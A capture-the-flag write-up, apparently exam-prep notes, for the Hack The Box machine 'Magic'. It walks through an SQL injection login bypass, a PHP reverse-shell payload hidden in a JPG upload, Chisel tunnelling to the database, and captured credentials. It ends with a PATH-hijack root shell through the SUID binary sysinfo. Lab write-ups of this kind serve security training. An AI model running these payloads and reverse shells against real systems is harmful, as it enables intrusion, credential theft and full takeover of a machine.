HTB Magic done
Magic
OS:
Linux
Technology:
IP Address:
10.10.10.185
Open ports:
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
Users and pass:
From config file: db.php5
L: theseus
P: iamkingtheseus
---
Inside database Magic
L: admin
P: Th3s3usW4sK1ng
---
SSH creds for user: theseus
L: theseus
P: Th3s3usW4sK1ng
Nmap
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Magic]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.10.10.185_nmap 10.10.10.185 ; cat 10.10.10.185_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-29 13:24 UTC
Nmap scan report for 10.10.10.185
Host is up (0.030s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
| 256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_ 256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Magic Portfolio
Ffuz: http://10.10.10.185/
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Magic]
└─$ ffuf -u http://10.10.10.185/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=1 -o 10.10.10.185_ffuz -of all -e .php,.html,.txt,.bac,.backup
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.10.185/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php .html .txt .bac .backup
:: Output file : 10.10.10.185_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
assets [Status: 301, Size: 313, Words: 20, Lines: 10, Duration: 30ms]
[INFO] Adding a new job to the queue: http://10.10.10.185/assets/FUZZ
images [Status: 301, Size: 313, Words: 20, Lines: 10, Duration: 31ms]
[INFO] Adding a new job to the queue: http://10.10.10.185/images/FUZZ
index.php [Status: 200, Size: 4055, Words: 491, Lines: 60, Duration: 33ms]
login.php [Status: 200, Size: 4221, Words: 1179, Lines: 118, Duration: 40ms]
logout.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 32ms]
upload.php [Status: 302, Size: 2957, Words: 814, Lines: 85, Duration: 34ms]
[INFO] Starting queued job on target: http://10.10.10.185/assets/FUZZ
css [Status: 301, Size: 317, Words: 20, Lines: 10, Duration: 30ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.10.10.185/assets/css/
js [Status: 301, Size: 316, Words: 20, Lines: 10, Duration: 36ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.10.10.185/assets/js/
[INFO] Starting queued job on target: http://10.10.10.185/images/FUZZ
uploads [Status: 301, Size: 321, Words: 20, Lines: 10, Duration: 40ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://10.10.10.185/images/uploads/
:: Progress: [122814/122814] :: Job [3/3] :: 1149 req/sec :: Duration: [0:01:59] :: Errors: 0 ::
Open website: http://10.10.10.185/login.php
I find SQLi
Payload: admin' or 1=1 --
---
Request - Burp
___
POST /login.php HTTP/1.1
Host: 10.10.10.185
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
Origin: http://10.10.10.185
Connection: keep-alive
Referer: http://10.10.10.185/login.php
Cookie: PHPSESSID=aaa
Upgrade-Insecure-Requests: 1
username=admin'%20or%201=1--%20&password=admin'%20or%201=1--%20
Create a revshell via jpg file
Payload:
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.25/80 0>&1'"); ?>
---
Start netcat
___
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Magic]
└─$ netcat -lvnp 80
listening on [any] 80 ...
---
Create file with revshell
___
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Magic]
└─$ cat revshell.php.jpg | tail -n 2
z9Ώ�&�Z�����N1?z����D\���prF��N
:U��@���(����Xg,LŘ)R�&�8���x����F
�E�f!h�;E�&��~"�U�Es��.�!.Dy��k�O�� �X�!�����0�1�PQP�IW~�!0�����/��.s)
NQ!���b�sy�)-����
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.25/80 0>&1'"); ?>
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Magic]
---
Upload file
___
http://10.10.10.185/upload.php
---
Open file from website
___
http://10.10.10.185/images/uploads/revshell.php.jpg
Open config file: db.php5
I found creds to database:
private static $dbName = 'Magic' ;
private static $dbHost = 'localhost' ;
private static $dbUsername = 'theseus';
private static $dbUserPassword = 'iamkingtheseus';
---
www-data@magic:/var/www/Magic$ cat db.php5
cat db.php5
<?php
class Database
{
private static $dbName = 'Magic' ;
private static $dbHost = 'localhost' ;
private static $dbUsername = 'theseus';
private static $dbUserPassword = 'iamkingtheseus';
private static $cont = null;
public function __construct() {
die('Init function is not allowed');
}
public static function connect()
{
// One connection through whole application
if ( null == self::$cont )
{
try
{
self::$cont = new PDO( "mysql:host=".self::$dbHost.";"."dbname=".self::$dbName, self::$dbUsername, self::$dbUserPassword);
}
catch(PDOException $e)
{
die($e->getMessage());
}
}
return self::$cont;
}
public static function disconnect()
{
self::$cont = null;
}
}
www-data@magic:/var/www/Magic$ cat .htaccess
cat .htaccess
<FilesMatch ".+\.ph(p([3457s]|\-s)?|t|tml)">
SetHandler application/x-httpd-php
</FilesMatch>
<Files ~ "\.(sh|sql)">
order deny,allow
deny from all
Create tunneling via Chisel
Download Chisel
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Magic]
└─$ wget https://github.com/jpillora/chisel/releases/download/v1.10.0/chisel_1.10.0_linux_amd64.gz .
--2024-08-30 06:49:28-- https://github.com/jpillora/chisel/releases/download/v1.10.0/chisel_1.10.0_linux_amd64.gz
Resolving github.com (github.com)... 140.82.121.4
Connecting to github.com (github.com)|140.82.121.4|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/31311037/b64ec114-628a-4a86-bc09-5e26486611f9?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240830%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240830T070025Z&X-Amz-Expires=300&X-Amz-Signature=f5042f364eac27604755cbf1a5c4fa32ffc3904d769abd157807a81d95548a7f&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=31311037&response-content-disposition=attachment%3B%20filename%3Dchisel_1.10.0_linux_amd64.gz&response-content-type=application%2Foctet-stream [following]
--2024-08-30 06:49:29-- https://objects.githubusercontent.com/github-production-release-asset-2e65be/31311037/b64ec114-628a-4a86-bc09-5e26486611f9?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240830%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240830T070025Z&X-Amz-Expires=300&X-Amz-Signature=f5042f364eac27604755cbf1a5c4fa32ffc3904d769abd157807a81d95548a7f&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=31311037&response-content-disposition=attachment%3B%20filename%3Dchisel_1.10.0_linux_amd64.gz&response-content-type=application%2Foctet-stream
Resolving objects.githubusercontent.com (objects.githubusercontent.com)... 185.199.109.133, 185.199.111.133, 185.199.108.133, ...
Connecting to objects.githubusercontent.com (objects.githubusercontent.com)|185.199.109.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3725506 (3.6M) [application/octet-stream]
Saving to: ‘chisel_1.10.0_linux_amd64.gz’
chisel_1.10.0_linux_amd64.gz 100%[==============================================>] 3.55M 13.2MB/s in 0.3s
2024-08-30 06:49:30 (13.2 MB/s) - ‘chisel_1.10.0_linux_amd64.gz’ saved [3725506/3725506]
--2024-08-30 06:49:30-- http://./
Resolving . (.)... failed: No address associated with hostname.
wget: unable to resolve host address ‘.’
FINISHED --2024-08-30 06:49:35--
Total wall clock time: 6.5s
Downloaded: 1 files, 3.6M in 0.3s (13.2 MB/s)
Upload to remote host
Start Python server
___
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Magic]
└─$ gunzip chisel_1.10.0_linux_amd64.gz
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Magic]
└─$ file chisel_1.10.0_linux_amd64
chisel_1.10.0_linux_amd64: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, Go BuildID=ZF9H7gK7fgkOTwWLrI1u/-1VhXiD0POv-x8Lyrr1A/TUEl2n4dbOopyLnv6sqH/gThkUIP-d9izNz4uWNR4, stripped
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Magic]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.185 - - [30/Aug/2024 06:50:07] "GET /chisel_1.10.0_linux_amd64 HTTP/1.1" 200 -
---
Download Chisel on remote host
___
www-data@magic:/tmp$ wget http://10.10.14.25/chisel_1.10.0_linux_amd64 .
wget http://10.10.14.25/chisel_1.10.0_linux_amd64 .
--2024-08-30 00:01:19-- http://10.10.14.25/chisel_1.10.0_linux_amd64
Connecting to 10.10.14.25:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8945816 (8.5M) [application/octet-stream]
Saving to: 'chisel_1.10.0_linux_amd64'
chisel_1.10.0_linux 100%[===================>] 8.53M 3.31MB/s in 2.6s
2024-08-30 00:01:21 (3.31 MB/s) - 'chisel_1.10.0_linux_amd64' saved [8945816/8945816]
--2024-08-30 00:01:21-- http://./
Resolving . (.)... failed: Name or service not known.
wget: unable to resolve host address '.'
FINISHED --2024-08-30 00:01:21--
Total wall clock time: 2.7s
Downloaded: 1 files, 8.5M in 2.6s (3.31 MB/s)
www-data@magic:/tmp$
www-data@magic:/tmp$
Chisel - tunneling
Kali Linux - Client Chisel
___
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Magic]
└─$ ./chisel_1.10.0_linux_amd64 client 10.10.10.185:9000 127.0.0.1:3306:127.0.0.1:3306
2024/08/30 08:35:59 client: Connecting to ws://10.10.10.185:9000
2024/08/30 08:35:59 client: tun: proxy#127.0.0.1:3306=>3306: Listening
2024/08/30 08:35:59 client: Connected (Latency 30.834013ms)
---
Victim - Server Chisel
___
www-data@magic:/tmp$ ./chisel_1.10.0_linux_amd64 server --socks5 --port 9000
./chisel_1.10.0_linux_amd64 server --socks5 --port 9000
2024/08/30 01:46:27 server: Fingerprint 0ZIuXQgXq9+uFHmmRKRBJTBP0+3/CI32JDXjPdSr+oQ=
2024/08/30 01:46:27 server: Listening on http://0.0.0.0:9000
Read database: Magic
I found creds:
L: admin
P: Th3s3usW4sK1ng
----
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Magic]
└─$ mysql -h 127.0.0.1 -u theseus -piamkingtheseus -D Magic
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 49
Server version: 5.7.29-0ubuntu0.18.04.1 (Ubuntu)
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Support MariaDB developers by giving a star at https://github.com/MariaDB/server
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [Magic]> show tables;
+-----------------+
| Tables_in_Magic |
+-----------------+
| login |
+-----------------+
1 row in set (0.031 sec)
MySQL [Magic]> SELECT * FROM login;
+----+----------+----------------+
| id | username | password |
+----+----------+----------------+
| 1 | admin | Th3s3usW4sK1ng |
+----+----------+----------------+
1 row in set (0.031 sec)
MySQL [Magic]>
Read flag: user.txt
Creds:
L: theseus
P: Th3s3usW4sK1ng
---
www-data@magic:/var/www/Magic/images/uploads$ whereis python
whereis python
python: /usr/bin/python3.6m /usr/bin/python3.6 /usr/lib/python2.7 /usr/lib/python3.6 /usr/lib/python3.7 /usr/lib/python3.8 /etc/python2.7 /etc/python3.6 /usr/local/lib/python3.6 /usr/include/python3.6m /usr/share/python
www-data@magic:/var/www/Magic/images/uploads$ /usr/bin/python3.6 -c 'import pty; pty.spawn("/bin/bash")'
<n/python3.6 -c 'import pty; pty.spawn("/bin/bash")'
www-data@magic:/var/www/Magic/images/uploads$ su theseus
su theseus
Password: Th3s3usW4sK1ng
theseus@magic:/var/www/Magic/images/uploads$ find / -name "user.txt" 2>/dev/null ; find / -name "local.txt" 2>/dev/null
< 2>/dev/null ; find / -name "local.txt" 2>/dev/null
/home/theseus/user.txt
theseus@magic:/var/www/Magic/images/uploads$ cd /home/theseus
cd /home/theseus
theseus@magic:~$ ls -a
ls -a
. .bash_profile Desktop .ICEauthority Public Videos
.. .bashrc Documents .local .ssh
.bash_history .cache Downloads Music Templates
.bash_logout .config .gnupg Pictures user.txt
theseus@magic:~$
theseus@magic:~$ cat user.txt ; id ; ip a
cat user.txt ; id ; ip a
7c90d693eafd3e9c9488a11639a4564f
uid=1000(theseus) gid=1000(theseus) groups=1000(theseus),100(users)
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:94:8e:92 brd ff:ff:ff:ff:ff:ff
inet 10.10.10.185/23 brd 10.10.11.255 scope global ens160
valid_lft forever preferred_lft forever
inet6 dead:beef::250:56ff:fe94:8e92/64 scope global dynamic mngtmpaddr
valid_lft 86400sec preferred_lft 14400sec
inet6 fe80::250:56ff:fe94:8e92/64 scope link
valid_lft forever preferred_lft forever
theseus@magic:~$
Privilege Escalation
Find SUID file
I found interesing app: /bin/sysinfo
---
theseus@magic:~$ find / -perm /4000 2>/dev/null | grep -Ev "core|lib"
find / -perm /4000 2>/dev/null | grep -Ev "core|lib"
/usr/sbin/pppd
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/traceroute6.iputils
/usr/bin/arping
/usr/bin/vmware-user-suid-wrapper
/bin/umount
/bin/fusermount
/bin/sysinfo
/bin/mount
/bin/su
/bin/ping
Checking details about : /bin/sysinfo
/bin.sysinfo has SUID for root and all users from group "users" can run it. App run a few system command like: fdisk, lshw, cat /proc/cpuinfo
---
theseus@magic:~$ ls -la /bin/sysinfo
ls -la /bin/sysinfo
-rwsr-x--- 1 root users 22040 Oct 21 2019 /bin/sysinfo
theseus@magic:~$
theseus@magic:~$ id
id
uid=1000(theseus) gid=1000(theseus) groups=1000(theseus),100(users)
theseus@magic:~$
theseus@magic:~$ strings /bin/sysinfo
strings /bin/sysinfo
/lib64/ld-linux-x86-64.so.2
libstdc++.so.6
__gmon_start__
_ITM_deregisterTMCloneTable
_ITM_registerTMCloneTable
_ZStlsIcSt11char_traitsIcESaIcEERSt13basic_ostreamIT_T0_ES7_RKNSt7__cxx1112basic_stringIS4_S5_T1_EE
_ZNSt13runtime_errorC1EPKc
_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEpLEPKc
_ZNSt8ios_base4InitD1Ev
_ZNSolsEPFRSoS_E
__gxx_personality_v0
__cxa_allocate_exception
_ZSt4endlIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_
_ZNSt8ios_base4InitC1Ev
_ZTISt13runtime_error
_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEED1Ev
__cxa_throw
_ZNSt13runtime_errorD1Ev
_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc
__cxa_free_exception
_ZSt4cout
_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEC1Ev
libgcc_s.so.1
_Unwind_Resume
libc.so.6
setuid
__stack_chk_fail
popen
fgets
__cxa_atexit
pclose
__cxa_finalize
setgid
__libc_start_main
GCC_3.0
CXXABI_1.3
GLIBCXX_3.4
GLIBCXX_3.4.21
GLIBC_2.4
GLIBC_2.2.5
%z!
%r!
%j!
%b!
%Z!
%R!
%J!
%B!
%:!
%2!
%*!
=Q!
=O
ATSH
[A\]
ATSH
[A\]
ATSH
[A\]
AWAVI
AUATL
[]A\A]A^A_
popen() failed!
====================Hardware Info====================
lshw -short
====================Disk Info====================
fdisk -l
====================CPU Info====================
cat /proc/cpuinfo
====================MEM Usage=====================
free -h
;*3$"
zPLR
GCC: (Ubuntu 7.4.0-1ubuntu1~18.04.1) 7.4.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.7697
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
info.c
_ZStL19piecewise_construct
_ZStL8__ioinit
_ZN9__gnu_cxxL21__default_lock_policyE
_ZStL13allocator_arg
_ZStL6ignore
_Z41__static_initialization_and_destruction_0ii
_GLOBAL__sub_I__Z4execB5cxx11PKc
__FRAME_END__
__GNU_EH_FRAME_HDR
_DYNAMIC
__init_array_end
__init_array_start
_GLOBAL_OFFSET_TABLE_
_ZNSt11_Tuple_implILm0EJP8_IO_FILEPFiS1_EEE7_M_headERS4_
_ZSt3getILm0EJP8_IO_FILEPFiS1_EEERNSt13tuple_elementIXT_ESt5tupleIJDpT0_EEE4typeERS8_
_ZNSt5tupleIJP8_IO_FILEPFiS1_EEEC1IRS1_S3_Lb1EEEOT_OT0_
_ZSt4moveIRP8_IO_FILEEONSt16remove_referenceIT_E4typeEOS4_
_edata
popen@@GLIBC_2.2.5
_ZSt12__get_helperILm0EP8_IO_FILEJPFiS1_EEERT0_RSt11_Tuple_implIXT_EJS4_DpT1_EE
_IO_stdin_used
_ZNSt13runtime_errorC1EPKc@@GLIBCXX_3.4.21
_ZNKSt15__uniq_ptr_implI8_IO_FILEPFiPS0_EE6_M_ptrEv
__cxa_finalize@@GLIBC_2.2.5
_ZNSt10_Head_baseILm1EPFiP8_IO_FILEELb0EE7_M_headERS4_
_ZNSt10unique_ptrI8_IO_FILEPFiPS0_EED1Ev
_ZNSt14__array_traitsIcLm128EE6_S_ptrERA128_Kc
_ZNSt5tupleIJP8_IO_FILEPFiS1_EEEC2IRS1_S3_Lb1EEEOT_OT0_
main
_ZSt4endlIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_@@GLIBCXX_3.4
__cxa_allocate_exception@@CXXABI_1.3
_ZNKSt5arrayIcLm128EE4sizeEv
_ZNSt10_Head_baseILm1EPFiP8_IO_FILEELb0EEC2IS3_EEOT_
_ZSt12__get_helperILm0EP8_IO_FILEJPFiS1_EEERKT0_RKSt11_Tuple_implIXT_EJS4_DpT1_EE
_ZNSt11_Tuple_implILm0EJP8_IO_FILEPFiS1_EEE7_M_headERKS4_
__dso_handle
_ZNSt10unique_ptrI8_IO_FILEPFiPS0_EEC2ES1_OS3_
_ZNSt10_Head_baseILm0EP8_IO_FILELb0EEC2IRS1_EEOT_
_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEED1Ev@@GLIBCXX_3.4.21
_ZNSt11_Tuple_implILm1EJPFiP8_IO_FILEEEE7_M_headERS4_
DW.ref.__gxx_personality_v0
__cxa_free_exception@@CXXABI_1.3
_ZNKSt10unique_ptrI8_IO_FILEPFiPS0_EEcvbEv
_ZSt3getILm1EJP8_IO_FILEPFiS1_EEERNSt13tuple_elementIXT_ESt5tupleIJDpT0_EEE4typeERS8_
_ZNSt10unique_ptrI8_IO_FILEPFiPS0_EED2Ev
_ZNSt15__uniq_ptr_implI8_IO_FILEPFiPS0_EEC2IS3_EES1_OT_
_ZNSt11_Tuple_implILm0EJP8_IO_FILEPFiS1_EEEC1IRS1_JS3_EvEEOT_DpOT0_
_ZSt7forwardIRP8_IO_FILEEOT_RNSt16remove_referenceIS3_E4typeE
_ZNKSt10unique_ptrI8_IO_FILEPFiPS0_EE3getEv
__cxa_atexit@@GLIBC_2.2.5
_ZStlsIcSt11char_traitsIcESaIcEERSt13basic_ostreamIT_T0_ES7_RKNSt7__cxx1112basic_stringIS4_S5_T1_EE@@GLIBCXX_3.4.21
_ZNSt10unique_ptrI8_IO_FILEPFiPS0_EEC1ES1_OS3_
_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEpLEPKc@@GLIBCXX_3.4.21
_ZNSt15__uniq_ptr_implI8_IO_FILEPFiPS0_EE10_M_deleterEv
_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc@@GLIBCXX_3.4
_ZNSt13runtime_errorD1Ev@@GLIBCXX_3.4
_ZNSolsEPFRSoS_E@@GLIBCXX_3.4
_ZSt12__get_helperILm1EPFiP8_IO_FILEEJEERT0_RSt11_Tuple_implIXT_EJS4_DpT1_EE
_ZNSt11_Tuple_implILm0EJP8_IO_FILEPFiS1_EEEC2IRS1_JS3_EvEEOT_DpOT0_
__stack_chk_fail@@GLIBC_2.4
__TMC_END__
_ZSt3getILm0EJP8_IO_FILEPFiS1_EEERKNSt13tuple_elementIXT_ESt5tupleIJDpT0_EEE4typeERKS8_
_ZNSt15__uniq_ptr_implI8_IO_FILEPFiPS0_EEC1IS3_EES1_OT_
_ZNSt10_Head_baseILm0EP8_IO_FILELb0EE7_M_headERS2_
_ZNSt10_Head_baseILm0EP8_IO_FILELb0EE7_M_headERKS2_
_ZSt7forwardIPFiP8_IO_FILEEEOT_RNSt16remove_referenceIS4_E4typeE
_ZSt4cout@@GLIBCXX_3.4
__data_start
_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEC1Ev@@GLIBCXX_3.4.21
_ZNSt5arrayIcLm128EE4dataEv
_ZNSt10_Head_baseILm1EPFiP8_IO_FILEELb0EEC1IS3_EEOT_
pclose@@GLIBC_2.2.5
_ZNSt11_Tuple_implILm1EJPFiP8_IO_FILEEEEC2IS3_EEOT_
__bss_start
_ZNSt8ios_base4InitC1Ev@@GLIBCXX_3.4
__libc_csu_init
_ZSt4moveIRPFiP8_IO_FILEEEONSt16remove_referenceIT_E4typeEOS6_
fgets@@GLIBC_2.2.5
__gxx_personality_v0@@CXXABI_1.3
_ZNSt15__uniq_ptr_implI8_IO_FILEPFiPS0_EE6_M_ptrEv
_ZNSt11_Tuple_implILm1EJPFiP8_IO_FILEEEEC1IS3_EEOT_
_ZNSt10_Head_baseILm0EP8_IO_FILELb0EEC1IRS1_EEOT_
__cxa_throw@@CXXABI_1.3
_ITM_deregisterTMCloneTable
_Unwind_Resume@@GCC_3.0
setgid@@GLIBC_2.2.5
__libc_csu_fini
__libc_start_main@@GLIBC_2.2.5
__gmon_start__
setuid@@GLIBC_2.2.5
_ZNSt10unique_ptrI8_IO_FILEPFiPS0_EE11get_deleterEv
_ITM_registerTMCloneTable
_ZTISt13runtime_error@@GLIBCXX_3.4
_ZNSt8ios_base4InitD1Ev@@GLIBCXX_3.4
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.gcc_except_table
.init_array
.fini_array
.data.rel.ro
.dynamic
.data
.bss
.comment
theseus@magic:~$
Revshell
Start netcat
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Magic]
└─$ netcat -lvnp 80
listening on [any] 80 ...
connect to [10.10.14.25] from (UNKNOWN) [10.10.10.185] 38448
root@magic:/tmp# id
id
uid=0(root) gid=0(root) groups=0(root),100(users),1000(theseus)
Create revshell
theseus@magic:/tmp$ echo "/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.25/80 0>&1'" > /tmp/lshw
<sh -i >& /dev/tcp/10.10.14.25/80 0>&1'" > /tmp/lshw
theseus@magic:/tmp$ chmod a+rwx /tmp/lshw
chmod a+rwx /tmp/lshw
Change PATH variable
theseus@magic:/tmp$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
theseus@magic:/tmp$
Run /bin/sysinfo
theseus@magic:/tmp$ /bin/sysinfo
/bin/sysinfo
====================Hardware Info====================
Read flag: root.txt
root@magic:/tmp# cd /root
cd /root
root@magic:/root# ls -a
ls -a
.
..
.bash_history
.bash_profile
.bashrc
.cache
.gnupg
info.c
.local
root.txt
snap
root@magic:/root# cat root.txt ; id ; ip a
cat root.txt ; id ; ip a
47d887303cfb2de3b32de4984c33726d
uid=0(root) gid=0(root) groups=0(root),100(users),1000(theseus)
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:94:8e:92 brd ff:ff:ff:ff:ff:ff
inet 10.10.10.185/23 brd 10.10.11.255 scope global ens160
valid_lft forever preferred_lft forever
inet6 dead:beef::250:56ff:fe94:8e92/64 scope global dynamic mngtmpaddr
valid_lft 86400sec preferred_lft 14400sec
inet6 fe80::250:56ff:fe94:8e92/64 scope link
valid_lft forever preferred_lft forever
root@magic:/root#
References
[Chisel_1.10.0_linux](https://github.com/jpillora/chisel/releases/download/v1.10.0/chisel_1.10.0_linux_amd64.gz)
Lessons Learned